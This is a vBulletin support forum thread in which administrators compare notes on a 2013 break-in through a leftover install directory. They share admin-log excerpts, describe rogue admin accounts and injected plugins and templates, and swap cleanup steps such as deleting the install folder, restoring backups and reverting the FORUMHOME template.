Announcement

Collapse
No announcement yet.

A new type hack method?

Collapse
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • #31
    my ajax_start plugin seems to be failing. the code in it looks suspect, but it could be normal.

    there is a file called fuhosin.php in my /forum/ directory that is signed by a hacker. I deleted it. Not sure if a different version of that should be there or not

    Comment


    • #32
      Originally posted by KryptonSite View Post
      I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

      I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?
      This exact thing happened to our forum today, as well. We've deleted the install directory and his account and are now trying to figure out what, if anything, he may have done to our system.

      Comment


      • #33
        Originally posted by runawayjim View Post
        my ajax_start plugin seems to be failing. the code in it looks suspect, but it could be normal.

        there is a file called fuhosin.php in my /forum/ directory that is signed by a hacker. I deleted it. Not sure if a different version of that should be there or not
        I did a quick search for fuhosin.php and came up with this.
        http://www.hardened-php.net/suhosin/

        May not be relevant but there you go...


        Comment


        • #34
          Originally posted by ToddG View Post

          This exact thing happened to our forum today, as well. We've deleted the install directory and his account and are now trying to figure out what, if anything, he may have done to our system.
          The person that added themselves to my forum deleted themselves afterwards, go to admincp>Statistics & Logs>controlpanellog>

          Show entres by:
          Blank space at the top (if they deleted themselves)
          or select their name if their still their,

          i got:

          Code:
           
          102106 N/A 18:13, 30th Aug 2013 user.php kill user id = 333162 198.203.28.247
          102105 N/A 18:13, 30th Aug 2013 user.php remove user id = 333162 198.203.28.247
          102104 N/A 18:13, 30th Aug 2013 user.php edit user id = 333162 198.203.28.247
          102103 N/A 18:13, 30th Aug 2013 user.php find 198.203.28.247
          102102 N/A 18:13, 30th Aug 2013 user.php modify 198.203.28.247
          102101 N/A 18:13, 30th Aug 2013 plugin.php 198.203.28.247
          102100 N/A 18:13, 30th Aug 2013 plugin.php kill plugin id = 8305 198.203.28.247
          102099 N/A 18:13, 30th Aug 2013 plugin.php delete plugin id = 8305 198.203.28.247
          102098 N/A 18:13, 30th Aug 2013 plugin.php modify 198.203.28.247
          102097 N/A 18:05, 30th Aug 2013 plugin.php 198.203.28.247
          102096 N/A 18:05, 30th Aug 2013 plugin.php doimport 198.203.28.247
          102095 N/A 18:04, 30th Aug 2013 plugin.php files 198.203.28.247
          From the looks of it they created a plugin, then deleted it then created a user and deleted that, i can't find any modified files on my server and i have don't have the plugins that other people have, the question is why give them selves access and take it away? i've looked through everything and can't find anything out of place

          Comment


          • #35
            [QUOTE}

            From the looks of it they created a plugin, then deleted it then created a user and deleted that, i can't find any modified files on my server and i have don't have the plugins that other people have, the question is why give them selves access and take it away? i've looked through everything and can't find anything out of place
            [/QUOTE]

            While I still had my forum running, someone suggest running a admincp thing that checks for unknown or unrecognized files, my system found several (and I have not modded much at all from the original install)

            What I found odd was the sql injections, they tried to inject all kinds of tags and code for various video sites, directly into the sql database, they were not trying to add posts or anything, just doing straight sql injections. Not sure there would be any way to check the sql file and see what has been changed in the last 4 days or not. If not, I am just pulling the forums completely so they can not compromise anything else on my server.

            Comment


            • #36
              Originally posted by kiss of death View Post

              From the looks of it they created a plugin, then deleted it then created a user and deleted that, i can't find any modified files on my server and i have don't have the plugins that other people have, the question is why give them selves access and take it away?
              From that, my assumption is that they came in, stuck something into your database using the plug in thing, erased the plug in thing to try and cover up what it was they did. Don't want to make you paranoid but what if they put something into your database that will or can be triggered by time or some other device. Or maybe I am the one that is paranoid?

              The post above also supports my paranoid theory..


              Comment


              • #37
                This happened to my forum as well. I misread the announcement (I thought 4.1+ didn't include 4.2.0) and didn't remove the install directory.

                I couldn't find any other changes though except the new admin account "Th3H4ck", maybe because I noticed the unusual username in time or password-protected admincp/modcp directory.

                A really scary moment.

                Comment


                • #38
                  Originally posted by DemOnstar View Post

                  From that, my assumption is that they came in, stuck something into your database using the plug in thing, erased the plug in thing to try and cover up what it was they did. Don't want to make you paranoid but what if they put something into your database that will or can be triggered by time or some other device. Or maybe I am the one that is paranoid?

                  The post above also supports my paranoid theory..
                  I thik your right, i do a daily backup so i can see this happened o the 30th i'l just restore the backup for the 29th to be on the safe side

                  Comment


                  • #39
                    Originally posted by kiss of death View Post

                    I thik your right, i do a daily backup so i can see this happened o the 30th i'l just restore the backup for the 29th to be on the safe side
                    Best to be on the safe side.
                    After looking up the IP, I see it is in China...http://ip-lookup.net/index.php

                    Oddly enough, that is where I reside...

                    Thanks for your input, this is a learning curve for me too...


                    Comment


                    • #40
                      Originally posted by hurricane_sh View Post
                      This happened to my forum as well. I misread the announcement (I thought 4.1+ didn't include 4.2.0) and didn't remove the install directory.

                      I couldn't find any other changes though except the new admin account "Th3H4ck", maybe because I noticed the unusual username in time or password-protected admincp/modcp directory.

                      A really scary moment.
                      Have you checked admincp>Statistics & Logs>controlpanellog? As above?


                      Comment


                      • #41
                        I'm still wondering how they managed to change peoples index pages just from creating an admin account which means the got ftp access or cpanel access which isn't available just for having an admin account?

                        i see the original poster of this thread had vbseo installed, just out of interest, can you go to ADMInCP>SETTINGS>OPTIONS> vBSEO Search Engine XML Sitemap

                        scroll down to "vBSEO Sitemap Interface Access Password" and tell me if the password you used their is the same as your cpanel or ftp account?

                        This is the only way i can currently think of that they might have gained higher access because the password is not encrypted their and any admin can view it and as we've seen before people continue to use the same passwords for everything which is how they get caught out.

                        Comment


                        • #42
                          Originally posted by kiss of death View Post

                          scroll down to "vBSEO Sitemap Interface Access Password" and tell me if the password you used their is the same as your cpanel or ftp account?
                          You may have something there?
                          Have to wait and see the results.


                          Comment


                          • #43
                            Originally posted by kiss of death View Post
                            I'm still wondering how they managed to change peoples index pages just from creating an admin account which means the got ftp access or cpanel access which isn't available just for having an admin account?

                            i see the original poster of this thread had vbseo installed, just out of interest, can you go to ADMInCP>SETTINGS>OPTIONS> vBSEO Search Engine XML Sitemap

                            scroll down to "vBSEO Sitemap Interface Access Password" and tell me if the password you used their is the same as your cpanel or ftp account?

                            This is the only way i can currently think of that they might have gained higher access because the password is not encrypted their and any admin can view it and as we've seen before people continue to use the same passwords for everything which is how they get caught out.
                            Are you pointing this question to me? If so, I can say that it's not about vbseo. At first, I was suspecting plugins (especially vbseo) too but I am convinced that it is not about plugins.

                            And no, I never use same passwords.

                            You can easily change peoples' index pages via style manager if you have admin account btw.

                            Comment


                            • DemOnstar
                              DemOnstar commented
                              Editing a comment
                              Then I guess that one is ruled out...

                            • Reignman
                              Reignman commented
                              Editing a comment
                              Yes, also if you search in search engines for hacked pages, you can see some of them has vbseo and some of them not.

                          • #44
                            Originally posted by Reignman View Post
                            You can easily change peoples' index pages via style manager if you have admin account btw.
                            Yeah but a few comments i read said that people had had their index.php and forum.php files switched and they just put the originals back i and everything was fine,

                            Also it wan't vbseo itself i was suspecting, it was the vbseo sitemap generator which people can use without vbseo,, before vb4 vbulletin had no built in sitemap generator and everyone was using the vbseo one because it was free, when vb4 came out a lot of people continued to use itand i do;t beleive their is a problem with it, only the fact that some people use the same passwords and it's clearly shown in a normal field in admincp,

                            yours was obviously done via style manager or it wouldn't still say vbseo at the bottom of the page, i was just curious

                            i'm just really confused as to why someone with that level of access would try and cover their tracks by removing the plugin and user account but not prune the logs?

                            Comment


                            • #45
                              Originally posted by Reignman View Post
                              I've searched in templates and I saw that he changed "FORUMHOME" script, I reverted it and everything turned back normal.
                              Same happened to me. Deleted "install" folder, found two admin accounts (deleted them), found three plugin entries (deleted them), and also found entries in one of the database tables.

                              That FORUMHOME entry in the database, how do I fix it? Copying vB files via FTP will not help.

                              Thanks

                              P.S.
                              Well, I just saw a REVERT button...

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X